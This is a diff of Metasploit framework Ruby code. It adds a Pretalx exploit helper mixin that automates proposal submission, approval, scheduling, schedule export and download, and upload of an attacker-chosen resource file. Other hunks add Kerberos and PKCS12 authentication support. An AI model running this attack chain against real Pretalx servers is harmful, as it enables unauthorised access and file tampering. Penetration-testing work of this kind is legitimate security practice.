+            fail_with(Msf::Module::Failure::UnexpectedReply, 'Could not get proposal submission page') unless res&.code == 302
+            general_info_uri = res.headers.fetch('Location', nil)
+
+            fail_with(Msf::Module::Failure::Unknown, 'Could not get general info page') unless general_info_uri
+
+            res_general_info = create_general_info(general_info_uri, proposal_name, abstract, description, notes, image, additional_speaker)
+
+            fail_with(Msf::Module::Failure::UnexpectedReply, 'Proposal submission failed on General Info step') unless res_general_info&.code == 302
+
+            account_info_uri = res_general_info.headers.fetch('Location', nil)
+            if account_info_uri.include?('/user')
+              fail_with(Msf::Module::Failure::Unknown, 'Could not get account info page') unless account_info_uri
+
+              res_account_info = create_account_info(account_info_uri, login_email, login_password, register_name, register_email, register_password)
+
+              fail_with(Msf::Module::Failure::UnexpectedReply, 'Proposal submission failed on Account Info step') unless res_account_info&.code == 302
+
+              profile_info_uri = res_account_info.headers.fetch('Location', nil)
+            else
+              profile_info_uri = res_general_info.headers.fetch('Location', nil)
+            end
+
+            fail_with(Msf::Module::Failure::Unknown, 'Could not get profile info page') unless profile_info_uri
+
+            res_profile_info = create_profile_info(profile_info_uri)
+
+            fail_with(Msf::Module::Failure::UnexpectedReply, 'Proposal submission failed on Profile Info step') unless res_profile_info&.code == 302
+
+            user_email = (login_email.empty?) ? register_email : login_email
+            user_password = (login_password.empty?) ? register_password : login_password
+
+            return { email: user_email, password: user_password, proposal_name: proposal_name }
+          end
+
+          def approve_proposal(proposal_name)
+            res = send_request_cgi({
+              'method' => 'GET',
+              'uri' => normalize_uri('orga', 'event', datastore['CONFERENCE_NAME'], 'submissions/')
+            })
+
+            fail_with(Msf::Module::Failure::UnexpectedReply, 'Could not find submissions') unless res&.code == 200
+
+            html = res.get_html_document
+
+            proposal_element = html.xpath('//td/a')&.find { |link| link.text.strip == proposal_name }
+
+            fail_with(Msf::Module::Failure::Unknown, 'Failed to find URI to proposal') unless proposal_element
+
+            proposal_uri = proposal_element['href']
+
+            fail_with(Msf::Module::Failure::Unknown, 'Could not find proposal ID') unless proposal_uri =~ %r{/orga/event/#{datastore['CONFERENCE_NAME']}/submissions/([a-zA-Z0-9]+)/}
+
+            proposal_id = Regexp.last_match(1)
+
+            res = send_request_cgi({
+              'method' => 'GET',
+              'uri' => normalize_uri(proposal_uri)
+            })
+
+            fail_with(Msf::Module::Failure::UnexpectedReply, 'Failed to get proposal approval page') unless res&.code == 200
+
+            html = res.get_html_document
+
+            approval_link = html.at('a[@class="dropdown-item submission-state-accepted"]')
+
+            fail_with(Msf::Module::Failure::Unknown, 'Could not find approval element, user might not have sufficient permissions') unless proposal_element
+
+            approval_uri = approval_link['href']
+
+            res = send_request_cgi({
+              'method' => 'GET',
+              'uri' => normalize_uri(approval_uri)
+            })
+
+            fail_with(Msf::Module::Failure::UnexpectedReply, 'Failed to get submission approval page') unless res&.code == 200
+
+            next_token = res.get_hidden_inputs.dig(0, 'next')
+            csrf_token = res.get_hidden_inputs.dig(0, 'csrfmiddlewaretoken')
+
+            fail_with(Msf::Module::Failure::Unknown, 'Could not find required hidden inputs') unless next_token && csrf_token
+
+            res = send_request_cgi({
+              'method' => 'POST',
+              'uri' => normalize_uri(approval_uri),
+              'vars_post' => { 'csrfmiddlewaretoken' => csrf_token, 'next' => next_token }
+            })
+
+            fail_with(Msf::Module::Failure::UnexpectedReply, 'Could not get approve submission') unless res&.code == 302
+
+            res = send_request_cgi({
+              'method' => 'GET',
+              'uri' => normalize_uri(datastore['CONFERENCE_NAME'], 'me', 'submissions', proposal_id, 'confirm')
+            })
+
+            fail_with(Msf::Module::Failure::UnexpectedReply, 'Could not get approval confirmation page') unless res&.code == 200
+
+            csrf_token = res.get_hidden_inputs.dig(0, 'csrfmiddlewaretoken')
+
+            fail_with(Msf::Module::Failure::Unknown, 'Could not find csrf token') unless next_token && csrf_token
+
+            res = send_request_cgi({
+              'method' => 'POST',
+              'uri' => normalize_uri(datastore['CONFERENCE_NAME'], 'me', 'submissions', proposal_id, 'confirm'),
+              'vars_post' => { 'csrfmiddlewaretoken' => csrf_token }
+            })
+
+            fail_with(Msf::Module::Failure::UnexpectedReply, 'Could not confirm approval') unless res&.code == 302
+            return proposal_id
+          end
+
+          def add_proposal_to_schedule(proposal_name)
+            res = send_request_cgi({
+              'method' => 'GET',
+              'uri' => normalize_uri('orga', 'event', datastore['CONFERENCE_NAME'], 'schedule', 'api', 'talks/')
+            })
+
+            fail_with(Msf::Module::Failure::UnexpectedReply, 'Could not get list of approved submissions') unless res&.code == 200
+
+            json_data = res.get_json_document
+
+            proposal = json_data.fetch('results', nil)&.find { |l| l['title'] == proposal_name }
+
+            fail_with(Msf::Module::Failure::NotFound, "Could not find approved submission with name #{proposal_name}") unless proposal
+
+            res = send_request_cgi({
+              'method' => 'GET',
+              'uri' => normalize_uri('api', 'events', datastore['CONFERENCE_NAME'], 'rooms/')
+            })
+
+            fail_with(Msf::Module::Failure::UnexpectedReply, 'Could not get list of rooms') unless res&.code == 200
+
+            rooms_json = res.get_json_document
+            rooms_list = rooms_json.fetch('results', nil)
+            fail_with(Msf::Module::Failure::Unknown, 'Received malformed JSON of rooms') unless rooms_list
+            rooms_list.each do |value|
+              res = send_request_cgi!({
+                'method' => 'GET',
+                'uri' => normalize_uri('orga', 'event', datastore['CONFERENCE_NAME'], 'schedule', 'api', 'availabilities', proposal['id'], value['id'])
+              })
+              next unless res&.code == 200
+
+              availability_json = res.get_json_document.fetch('results', nil)
+
+              next unless availability_json
+
+              availability_json.each do |timeslot|
+                schedule_slot = { 'room' => value.fetch('id', nil)&.to_s, 'start' => timeslot.fetch('start', nil), 'duration' => 30, 'description' => '' }
+
+                res = send_request_cgi({
+                  'method' => 'PATCH',
+                  'uri' => normalize_uri('orga', 'event', datastore['CONFERENCE_NAME'], 'schedule', 'api', 'talks', "#{proposal['id']}/"),
+                  'data' => JSON.generate(schedule_slot),
+                  'headers' => { 'X-CSRFToken' => @pretalx_token }
+                })
+                return true if res&.code == 200
+              end
+            end
+            false
+          end
+
+          def release_schedule
+            res = send_request_cgi({
+              'method' => 'GET',
+              'uri' => normalize_uri('orga', 'event', datastore['CONFERENCE_NAME'], 'schedule', 'release')
+            })
+
+            fail_with(Msf::Module::Failure::UnexpectedReply, 'Could not get schedule release') unless res&.code == 200
+
+            csrf_token = res.get_hidden_inputs.dig(0, 'csrfmiddlewaretoken')
+            html = res.get_html_document
+            version = html.at('input[@id="id_version"]')
+            fail_with(Msf::Module::Failure::Unknown, 'Could not get id_version') unless version
+            version_value = version['value']
+
+            res = send_request_cgi({
+              'method' => 'POST',
+              'uri' => normalize_uri('orga', 'event', datastore['CONFERENCE_NAME'], 'schedule', 'release'),
+              'vars_post' => { 'csrfmiddlewaretoken' => csrf_token, 'version' => version_value, 'comment_0' => '', 'notify_speakers' => 'off' }
+            })
+
+            fail_with(Msf::Module::Failure::Unknown, 'Failed to release schedule') unless res&.code == 302
+          end
+
+          def export_zip
+            res = send_request_cgi({
+              'method' => 'GET',
+              'uri' => normalize_uri('orga', 'event', datastore['CONFERENCE_NAME'], 'schedule', 'export/')
+            })
+
+            fail_with(Msf::Module::Failure::UnexpectedReply, 'Could not get export page') unless res&.code == 200
+
+            csrf_token = res.get_hidden_inputs.dig(0, 'csrfmiddlewaretoken')
+
+            res = send_request_cgi!({
+              'method' => 'POST',
+              'uri' => normalize_uri('orga', 'event', datastore['CONFERENCE_NAME'], 'schedule', 'export', 'trigger'),
+              'vars_post' => { 'csrfmiddlewaretoken' => csrf_token }
+            })
+
+            fail_with(Msf::Module::Failure::UnexpectedReply, 'Could not export schedule') unless res&.code == 200
+          end
+
+          def download_zip
+            res = send_request_cgi!({
+              'method' => 'GET',
+              'uri' => normalize_uri('orga', 'event', datastore['CONFERENCE_NAME'], 'schedule', 'export', 'download')
+            })
+
+            fail_with(Msf::Module::Failure::UnexpectedReply, 'Could not download ZIP file') unless res&.code == 200
+            return res.body
+          end
+
+          def get_submission_edit(proposal_id)
+            res = send_request_cgi({
+              'method' => 'GET',
+              'uri' => normalize_uri(datastore['CONFERENCE_NAME'], 'me', 'submissions', "#{proposal_id}/")
+            })
+
+            fail_with Failure::UnexpectedReply unless res&.code == 200
+            res
+          end
+
+          def get_resource_data(opts = {})
+            csrf_token = opts[:csrf_token] || ''
+            proposal_name = opts[:proposal_name] || ''
+            submission_type = opts[:submission_type] || ''
+            content_locale = opts[:content_locale] || ''
+            abstract = opts[:abstract] || ''
+            description = opts[:description] || ''
+            notes = opts[:notes] || ''
+            image = opts[:image] || ''
+            total_forms = opts[:total_forms] || ''
+            initial_forms = opts[:initial_forms] || ''
+            min_num_forms = opts[:min_num_forms] || ''
+            max_num_forms = opts[:max_num_forms] || ''
+            resource_id = opts[:resource_id] || ''
+            resource_description = opts[:resource_description] || ''
+            resource_name = opts[:resource_name] || ''
+            resource_content = opts[:resource_content] || ''
+
+            data_post = Rex::MIME::Message.new
+            data_post.add_part(csrf_token, '', '', %(form-data; name="csrfmiddlewaretoken"))
+            data_post.add_part(proposal_name, '', '', %(form-data; name="title"))
+            data_post.add_part(submission_type, '', '', %(form-data; name="submission_type"))
+            data_post.add_part(content_locale, '', '', %(form-data; name="content_locale"))
+            data_post.add_part(abstract, '', '', %(form-data; name="abstract"))
+            data_post.add_part(description, '', '', %(form-data; name="description"))
+            data_post.add_part(notes, '', '', %(form-data; name="notes"))
+            data_post.add_part(image, 'application/octet-stream', '', %(form-data; name="image"; filename=""))
+            data_post.add_part(total_forms, '', '', %(form-data; name="resource-TOTAL_FORMS"))
+            data_post.add_part(initial_forms, '', '', %(form-data; name="resource-INITIAL_FORMS"))
+            data_post.add_part(min_num_forms, '', '', %(form-data; name="resource-MIN_NUM_FORMS"))
+            data_post.add_part(max_num_forms, '', '', %(form-data; name="resource-MAX_NUM_FORMS"))
+            data_post.add_part(resource_id, '', '', %(form-data; name="resource-0-id"))
+            data_post.add_part(resource_description, '', '', %(form-data; name="resource-0-description"))
+            data_post.add_part(resource_content, 'application/octet-stream', '', %(form-data; name="resource-0-resource"; filename="#{resource_name}"))
+            return data_post
+          end
+
+          def edit_proposal(abstract, description, proposal_id, proposal_name, resource_name, resource_data)
+            res = get_submission_edit(proposal_id)
+            hidden_inputs = res.get_hidden_inputs
+            html = res.get_html_document
+
+            csrf_token = hidden_inputs.dig(0, 'csrfmiddlewaretoken')
+            submission_type = html.at("select[@name='submission_type']//option[@selected]")['value']
+            content_locale = hidden_inputs.dig(0, 'content_locale')
+            res_initial_forms = hidden_inputs.dig(0, 'resource-INITIAL_FORMS')
+            res_min_num_forms = hidden_inputs.dig(0, 'resource-MIN_NUM_FORMS')
+            res_max_num_forms = hidden_inputs.dig(0, 'resource-MAX_NUM_FORMS')
+
+            data_post = get_resource_data({ 
+              csrf_token: csrf_token, 
+              proposal_name: proposal_name,
+              submission_type: submission_type, 
+              content_locale: content_locale,
+              abstract: abstract,
+              description: description,
+              notes: Rex::Text.rand_text_alphanumeric(16),
+              image: '',
+              total_forms: '1',
+              initial_forms: res_initial_forms, 
+              min_num_forms: res_min_num_forms,
+              max_num_forms: res_max_num_forms, 
+              resource_id: '', 
+              resource_description: Rex::Text.rand_text_alphanumeric(4),
+              resource_name: resource_name, 
+              resource_content: resource_data 
+            })
+
+            res = send_request_cgi!({
+              'method' => 'POST',
+              'uri' => normalize_uri(datastore['CONFERENCE_NAME'], 'me', 'submissions', "#{proposal_id}/"),
+              'data' => data_post.to_s,
+              'ctype' => "multipart/form-data; boundary=#{data_post.bound}"
+            })
+
+            fail_with Failure::PayloadFailed unless res&.code == 200
+
+            res
+          end
+        end
+      end
+    end
+  end
+end
@@ -0,0 +1,41 @@
+ module Msf::Exploit::Remote::HTTP::Pretalx::Error
+    
+   class ClientError < ::StandardError
+     def initialize(message: nil)
+       super(message || 'Pretalx Client Error')
+     end
+   end
+    
+   class DebugError < ClientError
+     def initialize(message = 'Could not check if Pretalx runs in debug mode')
+       super(message: message)
+     end
+   end
+
+   class VersionCheckError < ClientError
+    def initialize(message = 'Could not fetch version number, might not have correct permissions')
+      super(message: message)
+    end
+   end
+   
+   class UnexpectedResponseError < ClientError
+    def initialize(message = 'Pretalx send unexpected response')
+      super(message: message)
+    end
+   end
+   
+   class SessionCookieError
+    def initialize(message = 'Could not get session cookie')
+      super(message: message)
+    end
+   end
+
+   # Csrf token error
+    class CsrfError < ClientError
+      def initialize(message = 'Could not successfully extract CSRF token')
+        super(message: message)
+      end
+    end
+
+
+ end
@@ -15,6 +15,8 @@ module Exploit::Remote::HttpClient

  include Msf::Auxiliary::Report
  include Msf::Auxiliary::LoginScanner
+  include Msf::Exploit::Remote::Kerberos::Ticket::Storage
+  include Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options

  #
  # Initializes an exploit module that exploits a vulnerability in an HTTP
@@ -35,6 +37,8 @@ module Exploit::Remote::HttpClient

    register_advanced_options(
      [
+        *kerberos_storage_options(protocol: 'HTTP'),
+        *kerberos_auth_options(protocol: 'HTTP', auth_methods: Msf::Exploit::Remote::AuthOption::HTTP_OPTIONS),
        OptString.new('UserAgent', [false, 'The User-Agent header to use for all requests',
          Rex::UserAgent.session_agent
          ]),
@@ -155,6 +159,30 @@ module Exploit::Remote::HttpClient

    http_logger_subscriber = Rex::Proto::Http::HttpLoggerSubscriber.new(logger: self)

+    kerberos_authenticator = nil
+    if datastore['HTTP::Auth'] == Msf::Exploit::Remote::AuthOption::KERBEROS
+      fail_with(Msf::Exploit::Failure::BadConfig, 'The HTTP::Rhostname option is required when using Kerberos authentication.') if datastore['HTTP::Rhostname'].blank?
+      fail_with(Msf::Exploit::Failure::BadConfig, 'The DOMAIN option is required when using Kerberos authentication.') if datastore['DOMAIN'].blank?
+      offered_etypes = Msf::Exploit::Remote::AuthOption.as_default_offered_etypes(datastore['HTTP::KrbOfferedEncryptionTypes'])
+      fail_with(Msf::Exploit::Failure::BadConfig, 'At least one encryption type is required when using Kerberos authentication.') if offered_etypes.empty?
+
+      kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::HTTP.new(
+        host: datastore['DomainControllerRhost'],
+        hostname: datastore['HTTP::Rhostname'],
+        proxies: datastore['Proxies'],
+        realm: datastore['DOMAIN'],
+        username: datastore['HttpUsername'],
+        password: datastore['HttpPassword'],
+        framework: framework,
+        framework_module: self,
+        cache_file: datastore['HTTP::Krb5Ccname'].blank? ? nil : datastore['HTTP::Krb5Ccname'],
+        mutual_auth: true,
+        use_gss_checksum: true,
+        ticket_storage: kerberos_ticket_storage,
+        offered_etypes: offered_etypes
+      )
+    end
+
    nclient = Rex::Proto::Http::Client.new(
      opts['rhost'] || rhost,
      (opts['rport'] || rport).to_i,
@@ -167,6 +195,7 @@ module Exploit::Remote::HttpClient
      proxies,
      client_username,
      client_password,
+      kerberos_authenticator: kerberos_authenticator,
      comm: opts['comm'],
      subscriber: http_logger_subscriber,
      sslkeylogfile: sslkeylogfile
@@ -375,6 +404,22 @@ module Exploit::Remote::HttpClient
      actual_timeout = opts[:timeout] || timeout
    end

+    unless opts.key?('preferred_auth')
+      case datastore['HTTP::Auth']
+      when Msf::Exploit::Remote::AuthOption::AUTO
+        opts['preferred_auth'] = nil
+      when Msf::Exploit::Remote::AuthOption::KERBEROS
+        opts['preferred_auth'] = 'Kerberos'
+      when Msf::Exploit::Remote::AuthOption::NTLM
+        opts['preferred_auth'] = 'NTLM'
+      when Msf::Exploit::Remote::AuthOption::PLAINTEXT
+        # Basic auth might as well be plaintext right?
+        opts['preferred_auth'] = 'Basic'
+      when Msf::Exploit::Remote::AuthOption::NONE
+        opts['preferred_auth'] = 'None'
+      end
+    end
+
    c = opts['client'] || connect(opts)
    r = opts['cgi'] ? c.request_cgi(opts) : c.request_raw(opts)

@@ -67,7 +67,7 @@ module Msf
              certificate.extensions.select { |ext| ext.oid == 'subjectAltName' }.each do |san_extension|
                begin
                  asn_san = OpenSSL::ASN1.decode(san_extension)
-                  asn_san_value = asn_san.value.find {|value| value.is_a? OpenSSL::ASN1::OctetString }
+                  asn_san_value = asn_san.value.find { |value| value.is_a? OpenSSL::ASN1::OctetString }

                  if asn_san_value.nil?
                    raise ArgumentError, 'Invalid certificate provided: unable to decode SAN'
@@ -95,7 +95,7 @@ module Msf
                  elsif san_entry.tag == 2 # dNSName
                    parts = san_entry.value.split('.')
                    if parts.length == 1
-                      user = san_entry
+                      user = san_entry.value  # Corrected to extract string value
                      domain = ''
                    else
                      user = parts[0] + '$'
@@ -110,15 +110,26 @@ module Msf
              end

              unless realm.nil? # and also username, since it's both or neither
-                unless results.map { |x| x.map(&:downcase) }.include?([username.downcase, realm.downcase])
-                  # If we've been provided an override but can't find them in a SAN, give a warning
+                normalized_results = results.map do |pair|
+                  pair.map do |value|
+                    if value.is_a?(String)
+                      value.downcase
+                    elsif value.is_a?(OpenSSL::ASN1::ASN1Data) && value.respond_to?(:value)
+                      val = value.value
+                      val.is_a?(String) ? val.downcase : val.to_s.downcase
+                    else
+                      value.to_s.downcase
+                    end
+                  end
+                end
+
+                unless normalized_results.include?([username.downcase, realm.downcase])
                  print_warning("Warning: Provided principal and realm (#{username}@#{realm}) do not match entries in certificate:")
                  results.each do |cert_username, cert_realm|
                    print_warning("  * #{cert_username}@#{cert_realm}")
                  end
                end

-                # But hey, they've overridden it, so off we go
                return [username, realm]
              end

@@ -220,16 +231,21 @@ module Msf
                client_dh_nonce: RASN1::Types::OctetString.new(value: dh_nonce)
              )

+
              auth_pack[:client_public_value][:subject_public_key].bit_length = pub_key_encoded.length * 8

+
              signed_auth_pack = sign_auth_pack(auth_pack, pfx.key, certificate)

+
              pa_as_req = Rex::Proto::Kerberos::Model::PreAuthPkAsReq.new

+
              pa_as_req.signed_auth_pack = signed_auth_pack

+
              Rex::Proto::Kerberos::Model::PreAuthDataEntry.new(type: Rex::Proto::Kerberos::Model::PreAuthType::PA_PK_AS_REQ,
-                                                                value: pa_as_req.to_der)
+                                                                  value: pa_as_req.to_der)
            end

            # Calculate the cryptographic signatures over the AuthPack, and create the appropriate
@@ -89,6 +89,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
  def_delegators :@framework_module,
                :print_status,
                :print_good,
+                :print_error,
                :vprint_error,
                :vprint_status,
                :workspace
@@ -156,8 +157,9 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
    credential = nil
    if cache_file.present?
      # the cache file is only used for loading credentials, it is *not* written to
-      credential = load_credential_from_file(cache_file, sname: nil, sname_hostname: @hostname)
-      serviceclass = build_spn.name_string.first
+      load_sname_hostname_credential_result = load_credential_from_file(cache_file, sname: nil, sname_hostname: @hostname)
+      credential = load_sname_hostname_credential_result&.fetch(:credential, nil)
+      serviceclass = build_spn&.name_string&.first
      if credential && credential.server.components[0] != serviceclass
        old_sname = credential.server.components.snapshot.join('/')
        credential.server.components[0] = serviceclass
@@ -167,9 +169,20 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
        ticket.sname.name_string[0] = serviceclass
        credential.ticket = ticket.encode
      elsif credential.nil? && hostname.present?
-        credential = load_credential_from_file(cache_file, sname: "krbtgt/#{hostname.split('.', 2).last}")
+        load_sname_krbtgt_hostname_credential_result = load_credential_from_file(cache_file, sname: "krbtgt/#{hostname.split('.', 2).last}")
+        credential = load_sname_krbtgt_hostname_credential_result&.fetch(:credential, nil)
      end
      if credential.nil?
+        print_error("Failed to load a usable credential from ticket file: #{cache_file}")
+        if load_sname_hostname_credential_result
+          print_error("Attempt failed to find a valid credential in #{cache_file} for #{load_sname_hostname_credential_result[:filter].map { |k, v| "#{k}=#{v.inspect}" }.join(', ')}:")
+          print_error(load_sname_hostname_credential_result[:filter_reasons].join("\n").indent(2))
+        end
+
+        if load_sname_krbtgt_hostname_credential_result
+          print_error("Attempt failed to find a valid credential in #{cache_file} for #{load_sname_krbtgt_hostname_credential_result[:filter].map { |k, v| "#{k}=#{v.inspect}" }.join(', ')}")
+          print_error(load_sname_krbtgt_hostname_credential_result[:filter_reasons].join("\n").indent(2))
+        end
        raise ::Rex::Proto::Kerberos::Model::Error::KerberosError.new("Failed to load a usable credential from ticket file: #{cache_file}")
      end
      print_status("Loaded a credential from ticket file: #{cache_file}")
@@ -361,7 +374,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
  # @return [Rex::Proto::Kerberos::CredentialCache::Krb5CcacheCredential] The ccache credential
  def request_tgt_only(options = {})
    if options[:cache_file]
-      credential = load_credential_from_file(options[:cache_file])
+      credential = load_credential_from_file(options[:cache_file])&.fetch(:credential, nil)
    else
      credential = get_cached_credential(
        options.merge(
@@ -1054,67 +1067,87 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
    )
  end

-  # Load a credential object from a file for authentication. Credentials in the file will be filtered by multiple
+  # Load a credential object from a file or database entry for authentication. Credentials in the credential cache will be filtered by multiple
  # attributes including their timestamps to ensure that the returned credential appears usable.
  #
-  # @param [String] file_path The file path to load a credential object from
-  # @return [Rex::Proto::Kerberos::CredentialCache::Krb5CacheCredential] the credential object for authentication
-  def load_credential_from_file(file_path, options = {})
-    unless File.readable?(file_path.to_s)
-      wlog("Failed to load ticket file '#{file_path}' (file not readable)")
-      return nil
-    end
+  # @param [String] path The path to load a credential object from
+  # @return [Hash] :credential [Rex::Proto::Kerberos::CredentialCache::Krb5CacheCredential] the credential object for authentication
+  # @return [Hash] :filter_reasons [Array<String>] the reasons for filtering tickets
+  def load_credential_from_file(path, options = {})
+    # Load a database reference or a path
+    if path&.start_with?('id:')
+      id = path.delete_prefix('id:')
+      storage = Msf::Exploit::Remote::Kerberos::Ticket::Storage::ReadOnly.new(framework: framework)
+      cache = storage.tickets({ id: id  }).first&.ccache
+      unless cache
+        wlog("Invalid cache id #{id} provided")
+        return { credential: nil }
+      end
+    else
+      unless File.readable?(path.to_s)
+        wlog("Failed to load ticket file '#{path}' (file not readable)")
+        return nil
+      end

-    begin
-      cache = Rex::Proto::Kerberos::CredentialCache::Krb5Ccache.read(File.binread(file_path))
-    rescue StandardError => e
-      elog("Failed to load ticket file '#{file_path}' (parsing failed)", error: e)
-      return nil
+      begin
+        cache = Rex::Proto::Kerberos::CredentialCache::Krb5Ccache.read(File.binread(path))
+      rescue StandardError => e
+        elog("Failed to load ticket file '#{path}' (parsing failed)", error: e)
+        return nil
+      end
    end

    sname = options.fetch(:sname) { build_spn&.to_s }
    sname_hostname = options.fetch(:sname_hostname, nil)
    now = Time.now.utc

+    filter = {
+      realm: @realm,
+      sname: sname,
+      sname_hostname: sname_hostname
+    }.merge(options)
+    filter_reasons = []
+
    cache.credentials.to_ary.each.with_index(1) do |credential, index|
      tkt_start = credential.starttime == Time.at(0).utc ? credential.authtime : credential.starttime
      tkt_end = credential.endtime
+      filter_reason_prefix = "Filtered credential #{path} ##{index} reason: "

      unless tkt_start < now
-        wlog("Filtered credential #{file_path} ##{index} reason: Ticket start time is before now (start: #{tkt_start})")
+        filter_reasons << "#{filter_reason_prefix}Ticket start time is before now (start: #{tkt_start})"
        next
      end

      unless now < tkt_end
-        wlog("Filtered credential #{file_path} ##{index} reason: Ticket is expired (expiration: #{tkt_end})")
+        filter_reasons << "#{filter_reason_prefix}Ticket is expired (expiration: #{tkt_end})"
        next
      end

      unless !@realm || @realm.casecmp?(credential.server.realm.to_s)
-        wlog("Filtered credential #{file_path} ##{index} reason: Realm (#{@realm}) does not match (realm: #{credential.server.realm})")
+        filter_reasons << "#{filter_reason_prefix} Realm (#{@realm}) does not match (realm: #{credential.server.realm})"
        next
      end

      unless !sname || sname.to_s.casecmp?(credential.server.components.snapshot.join('/'))
-        wlog("Filtered credential #{file_path} ##{index} reason: SPN (#{sname}) does not match (spn: #{credential.server.components.snapshot.join('/')})")
+        filter_reasons << "#{filter_reason_prefix}SPN (#{sname}) does not match (spn: #{credential.server.components.snapshot.join('/')})"
        next
      end

      unless !sname_hostname ||
-          sname_hostname.to_s.downcase == credential.server.components[1].downcase ||
-          sname_hostname.to_s.downcase.ends_with?('.' + credential.server.components[1].downcase)
-        wlog("Filtered credential #{file_path} ##{index} reason: SPN (#{sname_hostname}) hostname does not match (spn: #{credential.server.components.snapshot.join('/')})")
+             sname_hostname.to_s.downcase == credential.server.components[1].downcase ||
+             sname_hostname.to_s.downcase.ends_with?('.' + credential.server.components[1].downcase)
+        filter_reasons << "#{filter_reason_prefix}SPN (#{sname_hostname}) hostname does not match (spn: #{credential.server.components.snapshot.join('/')})"
        next
      end

      unless !@username || @username.casecmp?(credential.client.components.last.to_s)
-        wlog("Filtered credential #{file_path} ##{index} reason: Username (#{@username}) does not match (username: #{credential.client.components.last})")
+        filter_reasons << "Filtered credential #{path} ##{index} reason: Username (#{@username}) does not match (username: #{credential.client.components.last})"
        next
      end

-      return credential
+      return { credential: credential, filter: filter,  filter_reasons: filter_reasons }
    end

-    nil
+    { credential: nil, filter: filter, filter_reasons: filter_reasons }
  end
 end
@@ -41,7 +41,7 @@ module Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options
        [false, 'The resolvable rhost for the Domain Controller'],
        conditions: option_conditions
      ),
-      Msf::OptPath.new(
+      Msf::OptKerberosCredentialCache.new(
        "#{protocol}::Krb5Ccname",
        [false, 'The ccache file to use for kerberos authentication', nil],
        conditions: option_conditions
@@ -40,7 +40,7 @@ module Msf
          Opt::Proxies,
          *kerberos_storage_options(protocol: 'LDAP'),
          *kerberos_auth_options(protocol: 'LDAP', auth_methods: Msf::Exploit::Remote::AuthOption::LDAP_OPTIONS),
-          Msf::OptPath.new('LDAP::CertFile', [false, 'The path to the PKCS12 (.pfx) certificate file to authenticate with'], conditions: ['LDAP::Auth', '==', Msf::Exploit::Remote::AuthOption::SCHANNEL]),
+          Msf::OptPkcs12Cert.new('LDAP::CertFile', [false, 'The path to the PKCS12 (.pfx) certificate file to authenticate with'], conditions: ['LDAP::Auth', '==', Msf::Exploit::Remote::AuthOption::SCHANNEL]),
          OptFloat.new('LDAP::ConnectTimeout', [true, 'Timeout for LDAP connect', 10.0]),
          OptEnum.new('LDAP::Signing', [true, 'Use signed and sealed (encrypted) LDAP', 'auto', %w[ disabled auto required ]])
        ]
@@ -75,6 +75,7 @@ module Msf
    # @return [Hash] The options to use when connecting to the target
    #    LDAP server.
    def get_connect_opts
+      pkcs12_storage = Msf::Exploit::Remote::Pkcs12::Storage.new(framework: framework, framework_module: self)
      opts = {
        username: datastore['LDAPUsername'],
        password: datastore['LDAPPassword'],
@@ -82,7 +83,7 @@ module Msf
        base: datastore['BASE_DN'],
        domain_controller_rhost: datastore['DomainControllerRhost'],
        ldap_auth: datastore['LDAP::Auth'],
-        ldap_cert_file: datastore['LDAP::CertFile'],
+        ldap_pkcs12: datastore['LDAP::CertFile'] ? pkcs12_storage.read_pkcs12_cert_path(datastore['LDAP::CertFile']) : nil,
        ldap_rhostname: datastore['LDAP::Rhostname'],
        ldap_krb_offered_enc_types: datastore['LDAP::KrbOfferedEncryptionTypes'],
        ldap_krb5_cname: datastore['LDAP::Krb5Ccname'],
@@ -294,6 +294,8 @@ module Msf
          case ace.body.sid
          when Rex::Proto::Secauthz::WellKnownSids::SECURITY_WORLD_SID
            matcher.apply_ace!(ace)
+          when Rex::Proto::Secauthz::WellKnownSids::SECURITY_AUTHENTICATED_USER_SID
+            matcher.apply_ace!(ace)
          when Rex::Proto::Secauthz::WellKnownSids::SECURITY_PRINCIPAL_SELF_SID
            matcher.apply_ace!(ace) if self_sid == test_sid
          when Rex::Proto::Secauthz::WellKnownSids::SECURITY_CREATOR_OWNER_SID
@@ -302,6 +304,9 @@ module Msf
            matcher.apply_ace!(ace) if security_descriptor.group_sid == test_sid
          when test_sid
            matcher.apply_ace!(ace)
+          when Rex::Proto::Secauthz::WellKnownSids::SECURITY_LOCAL_SYSTEM_SID
+            # the SECURITY_LOCAL_SYSTEM_SID won't be found if looked up in the next block and if it's not the SID we're checking for, it doesn't apply anyways so just skip it
+            next
          else
            ldap_object = adds_get_object_by_sid(ldap, ace.body.sid)
            next unless ldap_object && ldap_object[:objectClass].include?('group')
@@ -16,6 +16,32 @@ module Msf::Exploit::Remote::Pkcs12
      @framework_module = framework_module
    end

+    # @param [String] cert_path A path to the file system where a pkcs12 cert is located, or a reference to a core database i.e., "id:123"
+    # @param [String] cert_pass The certificate password
+    # @param [String] workspace The workspace to restrict searches to
+    def read_pkcs12_cert_path(cert_path, cert_pass = '', workspace: nil)
+      if cert_path&.start_with?('id:')
+        core = framework.db.creds({ workspace: workspace, id: cert_path.delete_prefix('id:') }).first
+        raise Msf::ValidationError, 'Invalid cert id provided' unless core
+        raise Msf::ValidationError, 'Invalid cert id provided - not a pkcs12 credential' unless core.private.type == 'Metasploit::Credential::Pkcs12'
+
+        data = Base64.decode64(core.private.data)
+      else
+        is_readable = ::File.file?(cert_path) && ::File.readable?(cert_path)
+        raise Msf::ValidationError, 'Failed to load the PFX certificate file. The path was not a readable file.' unless is_readable
+        data = File.binread(cert_path)
+      end
+
+      begin
+        # TODO: Is it possible to read the cert pass from the db?
+        pkcs12 = OpenSSL::PKCS12.new(data, cert_pass)
+      rescue StandardError => e
+        raise Msf::ValidationError, "Failed to load the PFX file (#{e})"
+      end
+
+      { path: cert_path, value: pkcs12 }
+    end
+
    # Get stored pkcs12 matching the options query.
    #
    # @param [Hash] options The options for matching pkcs12's.
@@ -114,6 +114,8 @@ module Msf
      @module_info_copy = info.dup

      self.module_info = info
+      # Initialize UUID for RPC compatibility
+      uuid

      set_defaults

@@ -1,4 +1,6 @@
 require 'json'
+require 'parallel'
+require 'zlib'

 #
 # Handles storage of module metadata on disk. A base metadata file is always included - this was added to ensure a much
